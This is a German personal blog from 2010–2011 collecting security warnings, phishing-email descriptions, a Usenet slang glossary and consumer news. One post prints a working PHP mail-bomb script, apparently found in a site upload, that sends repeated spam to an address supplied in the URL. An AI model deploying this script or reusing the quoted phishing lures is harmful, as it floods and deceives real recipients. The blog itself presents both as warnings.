Hallo, Seit den Anfängen des Internets gibt es auch mich im Internet und das ist eine verdammt lange Zeit! Wir lieben das WWW und möchten auf Highlights hinweisen, die irgendwo da drausen schlummern!
Dienstag, 9. August 2011
Einfach nur genial daneben weltfremd, aber leider auch bezeichnend!
Mittwoch, 18. Mai 2011
Malware-Baukasten für Mac Systeme
Das daenische Sicherheitsunternehmen CSIS [http://www.csis.dk/en/csis/blog/3195/] berichtet die Entdeckung von einem der beliebten Malware-Baukästen wie es die stolzen Win - OS Nutzer ja schon zur genüge kennen.
Der BSI Newsletter ist wieder ne echte Wucht!
dachte ich endlich wieder die URL gefunden, weil das dort angebotene Tool zur Reinigung von BOT Netzen auf dem Rechner ist wirklich eine interessante Sache. Als ich dort aber las:Auf der Webseite www.botfrei.de [http://www.botfrei.de] koennen Sie Ihren Rechner ausserdem kostenlos auf eventuell vorhandene Schadprogramme ueberpruefen.
++++++Aus aktuellem Anlass stellen wir drei Anleitungen für die Bereinigung des BKA-Trojaners bereit++++++
Musste ich mich doch beherrschen!
Freitag, 7. Januar 2011
Mozilla siegt gegen Abofallenbetreiber
"Vor dem Landgericht Hamburg hat Mozilla eine Klage gegen Anbieter gewonnen, die Firefox und Thunderbird gegen Bezahlung angeboten hatten. Den Anbietern wurde untersagt, die beiden Open-Source-Applikationen gegen Gebühr zu verbreiten."
Gerichtsentscheidung: Mozilla siegt gegen Abofallenbetreiber - Golem.de
Montag, 18. Oktober 2010
Den Blog unter die Leute bringen
Freitag, 24. September 2010
Online genutzte Abkürzungen
Das Usenet (urspr. Unix User Network – engl. „Netzwerk für die Benutzer von Unix“) ist ein weltweites, elektronisches Netzwerk, das Diskussionsforen (so genannte „Newsgroups“) aller Art bereitstellt und an dem grundsätzlich jeder teilnehmen kann.
ACK - Acknowledge – Zustimmung. Gegenteil: NACK.
AFAIK – As far as I know – Soweit ich weiß
AFAIR – As far as I remember – Soweit ich mich erinnere
AFAI(C)S – As far as I (can) see – Soweit ich die Sache überblicke(n kann)
aka - also known as ... – auch bekannt als ...
AOL - „Finde ich auch“.
Artikel, Posting - Einzelner Beitrag in einer Gruppe. Das Abschickens eines Artikels nennt man „posten“.
BOFH - Bastard Operator From Hell
BTDT - Been there, done that – „ich war da und hab’s selbst probiert“ GTLT got that lousy T-shirt – „und hab dieses blöde T-Shirt bekommen“.
BTW - By The Way – Übrigens...
Cancel, canceln - Löschen eines Artikels.
CMIIW - Correct me if I’m wrong – „Korrigiert mich, wenn ich falsch liege“.
Crossposting - X-Posting xpost - Wenn man einen Artikel in mehrere Gruppen senden will
DAU - Dümmster Anzunehmender User
/dev/null - Untschüss.
EOD - End of discussion – „damit ist das Thema für mich erledigt, ich werde mich nicht mehr dazu äußern.“
EOT - End of thread/topic - Vorschlag, eine (fruchtlose) Diskussion komplett zu beenden.
FAQ - (gesprochen entweder „Eff-Ah-Kuh“ oder, wenn du dich traust, „fack“)
Frequently Asked Questions, „Fragen, die immer wieder gestellt werden“
Flame - persönlich verletzender Artikel
Flamewar - Artikel der alle Mitleser einfach nur genervt.
Follow-Up - Abkürzung: „F'up“. Artikel, der auf einen anderen Artikel Bezug nimmt.
Followup-To - Abkürzung: „F'up2“ - Angabe im Header, wohin Follow-Ups geschickt werden.
FRZ - Fragezeichen
„fuppen“ - Verb zu „F’up2“. Umleiten einer Diskussion
GABELN - Gruppe Area Brett Echo Liste Newsgroup.
Gruppe, Newsgroup, Forum - „Schwarzes Brett“ im Usenet, an dem sich die Artikel befinden.
^H - aus Versehen etwas falsches gesagt
^W - aus Versehen etwas falsches gesagt
Header - „Briefkopf“ eines Artikels
HTH - Hope that helps – „Ich hoffe, deine Frage ist damit zumindest so weit beantwortet, dass du erst einmal weiter kommst...“
IANAL - I am not a lawyer – „Ich bin kein Jurist“ - „Disclaimer“
IBTD - I beg to differ – „Bei allem Respekt, ich bin anderer Meinung“.
IIRC - If I remember/recall correctly – „Wenn ich mich recht erinnere...“
IM(H)O - In my (humble) opinion – „Meiner (bescheidenen) Meinung nach...“
die ~ machen - Ein Followup auf einen eigenen Artikel schreiben
IOW - In other words – „Mit anderen Worten...“
IRL - In Real Life – „im wirklichen Leben“
Jehova - Rotes Tuch - „JHVH“. Strenggläubigen Juden ist es verboten, diesen Namen in den Mund zu nehmen.
JFTR - Just for the record – „nur fürs Archiv“ - „nur zur Kenntnis“.
Killfile - Filterliste
LART - Luser Attitude Readjustment Tool – „Werkzeug zum Neuabgleich der Einstellung des Lusers“
LOL - Laugh out loud – Lautes Lachen.
RO(T)FL – Rolling On The Floor Laughing („wälze mich vor Lachen auf dem Boden“). ROFLASTC – ...And Scaring The Cat. Beliebig weiterführbar.
ROTFLBTCDICAJTTWADBSISWTRHITSBKABAYB: „Rolling On The Floor Laughing, Biting The Carpet, Dancing In Circles And Jumping Through The Window Almost Dying By Smashing Into Someone Who Then Runs Horrified Into The Street Being Killed Accidentally By A Yellow Bulldozer“
lurken, Lurker - „still“ mitlesen
man [...] - „man ...“ „Informiere dich bitte über [...], dann kannst du deine Frage selbst beantworten.“
Multiposting - → Crossposting
MUSEN - Meinem unmaßgeblichen Sprachempfinden nach.
Netcop - Rentnern mit Fernglas hinter der Gardine
Netiquette - elementare Benimmregeln für’s Usenet
Newbie - im Usenet noch neu
Newsreader - Programm für das Usenet
NUA - News User Agent – anderes Wort für Newsreader.
Nuhr - „Wenn man keine Ahnung hat: Einfach mal Fresse halten!“
OjE - User des Microsoft- Newsreader Outlook Express.
OP - Originalposting oder Originalposter
OT - Off topic – nicht zum Thema bzw. Themenbereich der Gruppe gehörend
Pawlow - eine mechanische und oft unangebrachte Reaktion
Plenken - vor Satzzeichen (besonders Frage- und Ausrufzeichen) einen Leerschritt setzen.
*PLONK* - Der Name eines Mitlesers auf dem Boden eines Killfiles aufgeschlagen
PM - Private Mail
Pointer - Stelle, wo eine Information zu finden ist
Popcorn - Diskussion zu einem Thema, das schon x Mal durchdiskutiert wurde
posten - Abschicken eines Usenet- Artikels
Pratchett - „Mehrfache Ausrufzeichen sind ein sicheres Zeichen eines kranken Geistes“
Quote, Zitat
ROT13 - alphabetische Rotation um 13 Stellen
RTFM - Read that f***ing manual! – „Lies das verd***te Handbuch!“
s/abc/xyz/ - Kurzform für: „Ersetze abc durch xyz“.
SCNR - Sorry, could not resist – „Entschuldigung, das konnte ich mir nicht verkneifen“
score adjusted - „ Scorefile angepasst“
Scorefile - „Intelligentes“ Bewertungssystem für Newsartikel
Shift-Taste, defekte - Eigenwillige Auslegung der Regeln zur Groß- und Kleinschreibung
Signatur, Sig - Fußzeile eines Postings
sinnfrei - „sinnlos“ oder „unsinnig“.
Spellflame - Missbrauch von Rechtschreibschwächen des Diskussionsgegners als Argument
Subject - Betreffzeile eines Artikels
Supersedes - Ein Artikel, der einen anderen ersetzt
Tante Gu - Weiß alles!
Thread - Gesamtheit eines Originalpostings und sämtlicher Follow-Ups
TIA - Thanks In Advance – „Danke im Voraus“
Tischkante - beißt vor Lachen in die Tischkante
TLA - Three Letter Acronym – „Drei-Buchstaben-Abkürzung“.
[tm] - Kürzel für „trademark“
TOFU - logische Folge von Frage und Antwort wird auf den Kopf gestellt.
Troll, Elch - bewusst herumpöbelnder Artikel
Usenetverwaltung - jeder passt auf sich selbst auf.
-v - „Das verstehe ich so nicht – könntest du es mal etwas ausführlicher darlegen?“
WFM - Works For Me – „Bei mir geht’s“
Wowereit - „Und das ist auch gut so“.
WWG - „Wieder was gelernt“
xf'up2 - Abkürzung für „ X-Post & F'up2 “
Xpost - Abkürzung für Crosspost.
YMMD - You Made My Day – „Du hast mir den Tag gerettet“
YMMV - Your Mileage May Vary „Unter anderen Umständen kann man natürlich auch zu ganz anderen Ergebnissen/Ansichten kommen“.
42 - „Zweiundvierzig“, niemand weiß mehr, wie die Frage eigentlich genau lautet.
!= - „... ist etwas anderes als ...“
Samstag, 11. September 2010
Mal ein kleiner Test für die Sicherheit
Meine Absicht ist es:
Die technischen Warnungen unseres Bundesministerium für Datensicherheit in der Informationstechnologie (BSI) und die eMail - Virenmeldungen des Viren - Tickers in Monaten zusammengefasst zu posten.
...
Es folgen die technischen Warnungen unseres Bundesministerium für Datensicherheit in der Informationstechnologie (BSI)
Zusammenfassung der Technischen Warnungen im Monat September
Die Details der Meldungen sind fuer Sie online abrufbar unter
http://www.buerger-cert.de
-----------------------------------------------------------------------
Sicherheitsupdate fuer Adobe Flash Player [Bcert-2010-0093/1]
Risiko: Hoch
Komplette Meldung:
http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0093
-----------------------------------------------------------------------
Microsoft Patchday September 2010 [Bcert-2010-0094/1]
Risiko: Mittel
Komplette Meldung:
http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0094
-----------------------------------------------------------------------
Apple Mac OS X Sicherheitsupdate 2010-006 [Bcert-2010-0095/1]
Risiko: Mittel
Komplette Meldung:
http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0095
-----------------------------------------------------------------------
-----------------------------------------------------------------------
Apple QuickTime Player 7.6.8 [Bcert-2010-0092/1]
Risiko: Hoch
Komplette Meldung:
http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0092
-----------------------------------------------------------------------
-----------------------------------------------------------------------
Mozilla Foundation aktualisiert Firefox, Thunderbird und Seamonkey
[Bcert-2010-0088/1]
Risiko: Hoch
Komplette Meldung:
http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0088
-----------------------------------------------------------------------
Apple Safari Safari 5.0.2 and Safari 4.1.2 [Bcert-2010-0089/1]
Risiko: Hoch
Komplette Meldung:
http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0089
-----------------------------------------------------------------------
Apple iPhone und iPod Touch [Bcert-2010-0090/1]
Risiko: Mittel
Komplette Meldung:
http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0090
-----------------------------------------------------------------------
Adobe Reader und Acrobat 9.3.4 [Bcert-2010-0091/1]
Risiko: Hoch
Komplette Meldung:
http://www.buerger-cert.de/techwarnung.aspx?msg_nr=Bcert-2010-0091
-----------------------------------------------------------------------
Mal sehen ob was nützliches dabei herauskommt?
Technische Warnungen des Buerger-CERT
[Bcert-2010-0093/1]:
Sicherheitsupdate fuer Adobe Flash Player
Risiko: Hoch
Betroffene Systeme:
Adobe Flash Player Version 10.1.82.76 und frueher fuer Windows, Macintosh, Linux und Solaris
Adobe Flash Player Version 10.1.92.10 und frueher fuer Android
Adobe Flash Player vor Version 9.0.283
Empfehlung:
Das Buerger-CERT empfiehlt die zeitnahe Aktualisierung des Adobe Flash Players (10.1.85.3 fuer Windows, Macintosh. Linux und Solaris bzw. 10.1.95.1 fuer Android) fuer den jeweils genutzten Browser. Bei dem Adobe Flash Player geschieht dies am einfachsten ueber die integrierte Update-Funktion oder ueber die Webseite
http://get.adobe.com/flashplayer/
Anwender des Flash Players fuer Android Version 10.1.92.10 und frueher koennen die Aktualisierung ueber den Android Marketplace durchfuehren.
Adobe bietet eine Webseite [2] zur Pruefung der aktuell installierten Flash Player Version an. Bei dem Einsatz mehrerer Browser sollte die Pruefung fuer jeden einzelnen Browser durchgefuehrt werden.
Fuer Anwender, die nicht auf Flash Player 10.1.85.3 aktualisieren koennen, stellt Adobe eine aktualisierte Flash Player Version 9.0.283 bereit [3].
Beschreibung:
Adobe behebt mit dem Sicherheitsupdate fuer den Flash Player eine kritische Schwachstelle, die es einem Angreifer ermoeglicht, beliebigen Code auf betroffenen Systemen auszufuehren. Hierfuer reicht bereits der Besuch einer vom Angreifer praeparierten Webseite.
[Bcert-2010-0088/1]:
Mozilla Foundation aktualisiert Firefox, Thunderbird und Seamonkey
Risiko: Hoch
Betroffene Systeme:
Mozilla Firefox vor Version 3.6.9
Mozilla Firefox vor Version 3.5.12
Mozilla Thunderbird vor Version 3.1.3
Mozilla Thunderbird vor Version 3.0.7
SeaMonkey vor Version 2.0.7
Empfehlung:
Das Buerger-CERT empfiehlt Nutzern des Webbrowsers Firefox und des E-Mail-Clients Thunderbird die von ihnen genutzte Versionsreihe zu aktualisieren. Der Support der Firefox-Versionsreihe 3.5 ist ausgelaufen.
Am einfachsten ist ein Update ueber die integrierte Update-Funktion moeglich:
Menue "Hilfe", "Nach Updates suchen..." bzw. "Firefox/Thunderbird aktualisieren".
Alternativ stehen die Installationspakete auf folgenden Webseiten zum Herunterladen bereit:
Firefox 3.6.9
http://www.mozilla.com/de/
Firefox 3.5.12
http://www.mozilla.com/en-US/firefox/all-older.html
Thunderbird 3.1.3
http://www.mozillamessaging.com/de/
Thunderbird 3.0.7
http://www.mozillamessaging.com/en-US/thunderbird/all-older.html
SeaMonkey 2.0.7
http://www.seamonkey-project.org/releases/
Beschreibung:
Ein Angreifer kann die von den Mozilla-Entwicklern in Firefox und Thunderbird geschlossenen Schwachstellen ausnutzen, um Informationen auszuspaehen, einen Absturz der Anwendung auszuloesen oder beliebigen Code zur Ausfuehrung zu bringen.
[Bcert-2010-0089/1]:
Apple Safari Safari 5.0.2 and Safari 4.1.2
Risiko: Hoch
Betroffene Systeme:
Apple Safari vor Version 5.0.2
Apple Safari vor Version 4.1.2
Empfehlung:
Das Buerger-CERT empfiehlt das von Apple bereitgestellte Safari-Sicherheitsupdate so rasch wie moeglich zu installieren. Dies geschieht unter Mac OS X am einfachsten ueber die integrierte Funktion "Software Aktualisierung" des Betriebssystems bzw. unter Microsoft Windows mit der Anwendung "Apple Software Update".
Alternativ kann das Safari-Update auch manuell von der Apple
Download-Webseite heruntergeladen werden:
http://support.apple.com/downloads/
Beschreibung:
Mit den Safari Versionen 5.0.2 und 4.1.2 schliesst Apple drei Sicherheitsluecken im Browser. Die Ausnutzung der Sicherheitsluecken ermoeglicht einem entfernten Angreifer mithilfe von praeparierten Webseiten u.a. die Ausfuehrung von Schadcode auf dem System des Opfers.
[Bcert-2010-0091/1]:
Adobe Reader und Acrobat 9.3.4
Risiko: Hoch
Betroffene Systeme:
Adobe Reader und Acrobat Version 9.3.4 und frueher
Empfehlung:
Ein Patch des Herstellers steht derzeit nicht zur Verfuegung. Derzeit verwenden die praeparierten PDF-Dokumente zur Ausnutzung dieser Sicherheitsluecke JavaScript. Daher eine Deaktivierung von JavaScript grundsaetzlich sinnvoll.
Dies ist in Adobe Reader und Acrobat ueber das Menue
"Bearbeiten" > "Voreinstellungen..." > Kategorie "JavaScript"
moeglich. Entfernen Sie zur Deaktivierung von JavaScript in PDF-Dokumenten den Haken vor der Option "Acrobat JavaScript aktivieren" und bestaetigen Sie das Fenster mit der Schaltflaeche "OK".
Diese Massnahme bietet allerdings keinen vollstaendigen Schutz vor Ausnutzung der Schwachstelle.
Beschreibung:
Adobe warnt vor einer neuen Sicherheitsluecke im Adobe Reader und Acrobat 9.3.4 sowie frueheren Versionen fuer Windows, Mac und Unix. Die Sicherheitsluecke wird bereits aktiv ausgenutzt, um ueber manipulierte PDF-Dokumente Windows-PCs zu kompromittieren.
Durch eMails verbreitete Viren
Zusammenfassung der Virenmeldungen im Monat September
Die Details der Meldungen sind fuer Sie online abrufbar unter
http://www.viren-ticker.de/
Angeblicher Abbuchungsauftrag versucht einen Trojaner einzuschleusen
Es werden E-Mails versandt, die angeblich einen Abbuchungsauftrag bestätigen. Der E-Mail-Text weist den Empfänger auf einen Rechnungsbetrag von 5.672 Euro hin – nähere Details könne der Empfänger dem beigefügten Anhang entnehmen. In dem Anhang steckt natürlich kein Abbuchungsauftrag, sondern der heimtückische Trojaner iBill.T, der das betreffende System infizieren will.
Die E-Mail hat folgendes Aussehen:
Betreff: Leihvertrag
Dateianhang: Rechnung.rar
Größe des Dateianhangs: 65 KByte
E-Mail-Text: „Sehr geehrter Kunde, sehr geehrte Kundin!
Ihr Abbuchungsauftrag Nr. 140525114897 wurde erfüllt.
Ein Betrag von 5672.00 EURO wurde abgebucht und wird in Ihrem Bankauszug als "Paypalabbuchung " angezeigt.“
Betroffene Betriebssysteme: Alle Windows-Versionen
mehr Infos finden Sie unter http://www.viren-ticker.de/ »»
Wurm tarnt sich als fehlgeleitete E-Mail
Der Wurm Mytob.A wieder unterwegs. Der Wurm versteckt sich im Anhang einer E-Mail, die scheinbar nicht zugestellt werden konnte. Nähere Angaben zu dieser E-Mail können Sie angeblich der im Anhang befindlichen Datei entnehmen. Und das ist natürlich gelogen.
Wird die sich im Anhang befindende Datei durch einen Doppelklick geöffnet, erhält man keine Informationen über die entsprechende E-Mail, die nicht zugestellt werden konnte. Stattdessen installiert sich der Wurm auf dem betreffenden System.
Die E-Mail hat folgendes Aussehen:
Betreff: „Mail Delivery System”
Dateianhang: „body.zip.exe“.
Größe des Dateianhangs: 41.824 Bytes.
E-Mail-Text: „Mail transaction failed. Partial message is available.“
Betroffene Betriebssysteme: Alle Windows-Versionen
mehr Infos finden Sie unter http://www.viren-ticker.de/ »»
Gefahr durch falschen Abbuchungsauftrag
Es werden E-Mails versandt, die angeblich einen Abbuchungsauftrag bestätigen. Der E-Mail-Text weist den Empfänger auf einen Rechnungsbetrag hin – nähere Details könne der Empfänger dem beigefügten Anhang entnehmen. In dem Anhang stecken natürlich keine Informationen über den Abbuchungsauftrag, sondern der heimtückische Wurm Klez.E7, der das betreffende System infizieren will.
Die E-Mail hat folgendes Aussehen:
Betreff: Vertrag
Dateianhang: Rechnung.rar
Größe des Dateianhangs: 65 KByte
E-Mail-Text: „Sehr geehrte Kundin, sehr geehrte Kunde,
Ihr Abbuchungsauftrag wurde erfüllt. Sie finden die Details zu der Rechnung im Anhang.“
Betroffene Betriebssysteme: Alle Windows-Versionen
mehr Infos finden Sie unter http://www.viren-ticker.de/ »»
Wurm lockt mit nackter Fußball-Mannschaft
Der Wurm Soccer.C lockt mit Bildern einer angeblich nackten Fußball-Mannschaft. Im Anhang der E-Mail befinden sich dann wie immer keine Bilder, sondern der Wurm lauert darauf, das betreffende System zu kapern.
Die E-Mail hat folgendes Aussehen:
Betreff: „Naked World Cup game set“
Dateianhang: soccer_nudist.bmp.exe
E-Mail-Text: „Nudists are organising their own tribute to the world cup, by staging their own nude soccer game, though it is not clear how the teams will tell each other apart. Good photos ;)“.
Dateigröße: 39.904 Bytes
Betroffene Betriebssysteme: Alle Windows-Versionen
mehr Infos finden Sie unter http://www.viren-ticker.de/ »»
E-Mail aus China lockt mit angeblichen Dokument im Anhang
Der Wurm Traxgy.B5 ist unterwegs und verstopft die E-Mail-Postfächer. Im Anhang befindet sich ein angebliches Dokument. Die E-Mail ist leicht zu erkennen, da Betreff und E-Mail-Text aus chinesischen Schriftzeichen bestehen. Im Anhang befindet sich aber eine Datei mit der Bezeichnung Document.
Nach einem Doppelklick auf die im Anhang befindliche Datei, wird jedoch kein Dokument mit dem verknüpften Textverarbeitungsprogramm geöffnet, stattdessen installiert sich der Wurm auf dem System.
Die E-Mail hat folgendes Aussehen:
Betreff: %chinesischer Text%
Dateianhang: Document
Dateierweiterung: .exe
Größe des Dateianhangs: 57.344 Bytes
E-Mail-Text: %chinesischer Text% Document.exe %chinesischer Text%
mehr Infos finden Sie unter http://www.viren-ticker.de/ »»
Trojaner kommt mit falscher Rechnung von Amazon
Es werden E-Mails versandt, die angeblich von Amazon stammen. Der E-Mail-Text weist den Empfänger auf einen Rechnungsbetrag von 715 Euro für einen bestellten Laptop hin – nähere Details könne der Empfänger dem beigefügten Anhang entnehmen. In dem Anhang steckt natürlich keine Rechnung, sondern ein heimtückischenr Trojaner, der das betreffende System infiziert.
Die E-Mail hat folgendes Aussehen:
Betreff: „Ihre Bestellung 2984234 bei Amazon.de“.
Dateianhang: „Rechnung.doc.zip“
E-Mail-Text: „Vielen Dank für Ihre Bestellung bei Amazon.de!
Das Sony VAIO Notebook wird in Kürze versendet. Die Kosten von 715,- Euro werden Ihrem Konto zu Last gelegt. Die Einzelheiten zu Ihrer Bestellung entnehmen Sie bitte der angefügten Rechnung. Falls Sie die Bestellung stornieren möchte, bitte den in der Rechnung angegebenen Kundenservice anrufen und Ihre Bestellnummer bereithalten. Eine Kopie der Rechnung wird Ihnen in den nächsten Tagen schriftlich zugestellt.
Virus: Dldr.iBill.Z
Virustyp: Trojaner
Dateigröße: 12.800 Bytes
Betroffene Betriebssysteme: Alle Windows-Versionen
mehr Infos finden Sie unter http://www.viren-ticker.de/ »»
Gefälschter Office-Patch versucht Ihr System zu kapern
Der Trojaner Badware12 ist unterwegs und versucht Anwendern ein falsches Microsoft Office-Update vorzugaukeln. Die E-Mail ist angeblich vom Onlinedienst MSN und enthält ein Update für Office 2007. Das ist natürlich gelogen: Wer dem Link in der E-Mail folgt, erhält kein Update, sondern einen gefährlichen Trojaner untergeschoben.
Die E-Mail hat folgendes Aussehen:
Betreff: „Update for Office 2007 only“
E-Mail-Text: unterschiedlicher Text
Betroffene Betriebssysteme: Alle Windows-Versionen
mehr Infos finden Sie unter http://www.viren-ticker.de/ »»
Dienstag, 7. September 2010
Mit Dateiuploads sich den Tag versauen
$t="Sp0wnd!";
$n="Y0u @r3 Sp0wnd by ~B4CksT0r~";
$a="~B@(ksT0r~";
$e=$_GET['e'];
$az=$_GET['az'];
for($i=0;$i<$az;$i++){
mail($e, $t, $n,"From: $a <$a>");
}
?>
Dabei ist dieser kleine Mehrzeiler nicht gerade ein Ausbruch an Intelligenz, sondern eher Mittelklasse, da er nicht mehr wie fachliche Grundkenntnisse verlangt und trotzdem wird die IP schön versteckt nur für wenige bekannt garantiert nie den wirklichen Spammer verraten. Es ist andererseits mit der FOR Abfrage schon direkt ein Riesenschritt von den profanen und allseits beliebten Übergabe URLs der Spammer für Gästebücher und andere Kommunikationsmöglichkeiten mit WebSites.
Wir empfehlen zur Spamvermeidung durch ÜbergabeURLs das bewährte ReCaptcha System:
http://www.google.com/recaptcha
Sonntag, 15. August 2010
Microsoft Download Center: Suchergebnisse
Vorteil:
Damit haben Sie alle Möglichkeiten der Windows Produktgruppen abgedeckt.
Nachteil:
Die ISO Dateien variieren und können abhängig von der Datenmenge bis zu 2 DVDs benötigen.
Microsoft Download Center: Suchergebnisse ISO-Abbild
Donnerstag, 15. Juli 2010
AD Nutzer sind zur Zeit der häßliche Mops
Bürger-CERT ist ein Projekt des Bundesamtes für Sicherheit in der Informationstechnik (BSI).
SICHER o INFORMIERT
Extraausgabe vom 15.07.2010
Webauftritte verteilen Schadcode an Internetnutzer
Kompromittierte Werbebanner
Es sollte deshalb jedes Betriebssystem, Anwendung und Antivirenschutz stets auf dem aktuellen Stand gehalten werden. Insbesondere sollten die verfuegbaren Patches für Java, Adobe-Reader und Windows-Betriebssysteme installiert werden.
Die Firefox-Erweiterung NoScript [https://addons.mozilla.org/de/firefox/addon/722/] schuetzt in der Default-Einstellung vor eingebetteten IFRAME-HTML-Elementen, allerdings und auch leider nicht nur davor.
Sonntag, 11. Juli 2010
Neues Phishing-Ziel: DHL-Packstationen
Neues Phishing-Ziel: DHL-Packstationen
(mehr)
Hacker knackt Skype-Verschlüsselung - Internet bei WEB.DE
Hacker knackt Skype-Verschlüsselung - Internet bei WEB.DE
Schluss mit der Abzocke im Internet
Die rasche Umsetzung einer nationalen Button-Lösung zur Bekämpfung von Kostenfallen im Internet fordert der Verbraucherzentrale Bundesverband (vzbv). Damit würden die versteckten Kosten bei unseriösen Internetangeboten sichtbar gemacht und der Abzocke von Verbrauchern durch Abofallen endlich Einhalt geboten. In Frankreich gibt es bereits eine Bestätigungslösung, Kostenfallen sind dort kein Thema.
Schaden im Millionenhöhe
Ob Hausaufgabenhilfen, Kochrezepte oder Software: Mit unzähligen vermeintlichen Gratis-Diensten locken unseriöse Anbieter Internetnutzer in eine Kostenfalle. Viele Verbraucher rechnen nicht damit, für Dienste zahlen zu müssen, die es im Internet im Normalfall kostenlos gibt. Im guten Glauben geben sie ihren Namen und ihre Adresse an - und haben ein teures Abo abgeschlossen. Anschließend überziehen die Betreiber Betroffene mit einschüchternden Drohbriefen. Nicht Wenige zahlen aus Angst die haltlosen Forderungen. In Deutschland liegt der Schaden jährlich im mehrstelligen Millionenbereich. Seit Jahren gewinnt der vzbv gegen unseriöse Online-Anbieter ein Verfahren nach dem anderen. Trotzdem nimmt die Abzocke weiter zu, wie die nicht nachlassenden Beschwerdefälle in der Verbraucherberatung zeigen.
Sonntag, 20. Juni 2010
Das BSI warnt vor Wurm in Facebook
Derzeit breitet sich ein Wurm im sozialen Netzwerk "Facebook" aus. Er nutzt eine seit mehreren Wochen bekannte Schwachstelle in Facebook, in dem scheinbar harmlose Maus-Klicks unbemerkt ungewollte Aktionen ausloesen (siehe dazu auch Wikipedia [http://de.wikipedia.org/wiki/Clickjacking]).
Dieser Wurm fuegt eine manipulierte Statusmeldung dem eigenem Profil hinzu, die zu einer Webseite mit dem Titel "101 Hottest Women in The World" verweist. Freunde, die auf diese Statusmeldung klicken, fuegen ihrerseits diese Statusmeldung ihrem Profil hinzu.
Wer bei der Nutzung von Facebook auf den Link stoesst, sollte ihn in keinem Fall anklicken. Facebook-Nutzern, die bereits auf eine entsprechende Seite geklickt haben, raet das Buerger-CERT dringend, ihr Profil zu bearbeiten und die schadhafte Statusmeldung zu entfernen, um die Weiterverbreitung des Wurms zu vermeiden.
Es ist ist zu erwarten, dass weitere Wuermer diese Schwachstelle ausnutzen und sich ihrerseits mit manipulierten Statusmeldungen oder anderen Profilbestandteilen versuchen zu verbreiten.
Betroffen sind alle Standard-Webbrowser mit Ausnahme von Firefox mit der Browser-Erweiterung NoScript
[https://addons.mozilla.org/de/firefox/addon/722/].
Neuerungen im Internet Explorer 8
wichtigsten Neuerungen im Sicherheitsbereich der brökelnden Bereitschaft den Microsoft Internet Explorer als Standardbrowser zu nutzen, eine Wende zu bereiten.
Für unseren Geschmack sind die Werbespots zwar recht unterhaltsam, aber leider nicht ausreichend informativ, deshalb listen wir 8 der wichtigsten Neuerungen ausführlicher.
- Domänenhervorhebung
Zeigt die tatsächliche Webadressen der besuchten Websites in der Adressleiste deutlich an. - SmartScreen-Filter
Schützt vor Phishingangriffen, Betrug und gefälschten bzw. bösartigen Websites - Cross-site Scripting (XSS)-Filter
Der Filter überwacht sämtliche Anfragen und Antworten des Browsers und setzt entsprechende XSS-Attacken außer Kraft, sobald sie erkannt werden. - Datenausführungsverhinderung
Vermeidet Schaden durch Viren oder andere Sicherheitsrisiken, indem gefährlicher Code daran gehindert wird, in den ausführbaren Speicher zu schreiben. - InPrivate-Filterung
Regeln Sie selbst, ob Informationen zu den besuchten Websites an andere Inhaltsanbieter weitergegeben werden. - InPrivate-Browsen
Surfen im Internet, ohne einen Verlauf im Browser aufzuzeichnen. - Löschen des Browserverlaufs
Selektives Löschen einzelner Cookies, Verlaufselemente und anderer Daten. - Schutz vor ClickJacking
Verhindert, dass durch scheinbar harmlose Mausklicks oder Tastatureingaben andere Aktionen durchgeführt werden, als die Schaltfläche vorgibt.
mit denen Sie Ihren Firefox dem Aussehen Ihres PCs vollkommen anpassen können, finden Sie unter diesem Link.
Montag, 10. Mai 2010
Die Pornoblacklisten wurden aufgerüstet
Die dadurch entstehende host Datei wird in der Zwischenzeit aber dadurch etliche MB groß, was bei den Kapazitäten mit denen heute durchschnittliche Rechner aufwarten können, aber kein Problem darstellen dürfte.
Das Nutzung des Projekts ist natürlich weiterhin kostenlos, wir freuen uns aber über jede Spende!
Nachtrag vom Mai 2011
Wir haben unsere Webs bei den Freehostern entnervt vom Netz genommen, so weit es ging zumindest, Das Aufspielen der neuen Web ist nicht so schnell zu erledigen, wie wir es gerne hätten, deshalb ist der Link wohl bis auf weiteres auch nicht erreichbar.
http://blacklist.franky4you.de/
Empfohlener Beitrag
und Klatsch schlägt das Karma schon wieder zu....
und Klatsch schlägt das Karma schon wieder zu.... Hallo Leute es ist leider so! Auf Grund nicht endend wollender Krankheit sind wir leid...
-
NSFW ≙ Not save for work ≙ Unsere Webs Eigentlich mag ich so etwas gar nicht sagen, wenn ich ich so viel Zeit damit verbracht habe unsere We...
-
◘ NICs ◘ - ◘ Global NICs ◘ - ◘ Local NICs ◘ Die NICs sind gemeinnützige Organisationen, die das Domain Name System (DNS) und die Vergabe v...
-
Sogar Legenden sterben und wohl nicht nur als Person Hacker und Hacker:inchen waren noch nie beliebt. Aber sehr viele alte Mitglieder dieser...